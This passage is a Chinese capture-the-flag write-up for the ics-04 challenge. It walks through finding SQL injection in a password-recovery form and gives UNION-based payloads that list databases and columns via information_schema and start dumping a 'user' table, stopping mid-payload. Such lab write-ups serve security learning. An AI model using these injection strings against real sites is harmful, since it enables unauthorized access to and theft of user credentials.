攻防世界ics-04解题思路
题目 攻防世界ics-04 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 解题思路 打开题目提供的环境,发现整个页面只有注册、登录、找回密码功能是可以用的,尝试注册一个账户进行登录,提示普通用户登录成功,没什么用,可以猜测出题者的意图是让我们拿到管理员账号登录获得flag。 打开找回密码界面,随意输入一个用户名,发现界面上会提示没有这个用户,因此此处应该可以爆破用户名,但是如果用户名不是常见用户名就是白费体力了,先搁置。 在用户名输入框尝试SQL注入,发现注入成功,于是尝试从这里入手拿到用户密码。 构造SQL语句: ' union select 1,2,group_concat(char(32,58,32),schema_name),4 from information_schema.schemata;# ,可以列出所有的数据库名,发现题目用到的库是cetc004。 构造SQL语句: ' union select 1,2,group_concat(char(32,58,32),column_name),4 from information_schema.columns where table_schema='cetc004' and table_name='user';# ,可以列出 user 表中所有的字段。 直接列出 user 表中所有的数据: ' union